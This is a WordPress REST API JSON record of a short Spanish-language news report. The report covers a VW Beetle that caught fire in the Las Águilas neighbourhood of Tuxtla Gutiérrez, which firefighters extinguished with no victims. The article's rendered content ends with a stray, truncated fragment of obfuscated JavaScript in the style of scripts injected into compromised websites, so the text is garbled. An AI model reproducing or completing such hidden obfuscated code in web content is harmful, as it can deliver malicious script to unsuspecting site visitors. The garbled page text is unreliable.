{"id":16363,"date":"2024-06-27T04:55:27","date_gmt":"2024-06-27T04:55:27","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16363"},"modified":"2024-06-27T04:55:28","modified_gmt":"2024-06-27T04:55:28","slug":"se-incendia-escarabajo-en-calles-de-las-aguilas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16363","title":{"rendered":"Se incendia escarabajo en calles de Las \u00c1guilas"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"823\" data-id=\"16365\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719463984757-1024x823.jpg\" alt=\"\" class=\"wp-image-16365\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719463984757-1024x823.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719463984757-300x241.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719463984757-768x617.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719463984757.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"16364\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719463987152-1024x768.jpg\" alt=\"\" class=\"wp-image-16364\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719463987152-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719463987152-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719463987152-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719463987152.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"16366\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719463982099-1024x768.jpg\" alt=\"\" class=\"wp-image-16366\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719463982099-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719463982099-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719463982099-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1719463982099.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 26 de junio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la tarde se incendi\u00f3 un Vw Sed\u00e1n cuando circulaba sobre el Bulevar Fidel Vel\u00e1zquez y Calle Circuito Monta\u00f1a de la Colonia Las \u00c1guilas de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, el propietario de la unidad circulaba en la citada direcci\u00f3n cuando de manera repentina el veh\u00edculo comenz\u00f3 a fallar y al detenerse observ\u00f3 que estaba ardiendo la parte del motor.<\/p>\n\n\n\n<p>Tras llamar a los n\u00fameros de emergencias, arribaron elementos del Cuerpo de Bomberos y controlaron el siniestro.<\/p>\n\n\n\n<p>Los vecinos del lugar, intentaron apagar el fuego pero no lo lograron.<\/p>\n\n\n\n<p>Afortunadamente, no hubo v\u00edctimas que lamentar en este incendio.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 26 de junio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la tarde se incendi\u00f3 un Vw Sed\u00e1n cuando circulaba sobre el Bulevar Fidel Vel\u00e1zquez y Calle Circuito Monta\u00f1a de la Colonia Las \u00c1guilas de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que, el propietario de la unidad circulaba en la citada &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16365,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-16363","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16363","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16363"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16363\/revisions"}],"predecessor-version":[{"id":16367,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16363\/revisions\/16367"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16365"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16363"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16363"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16363"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}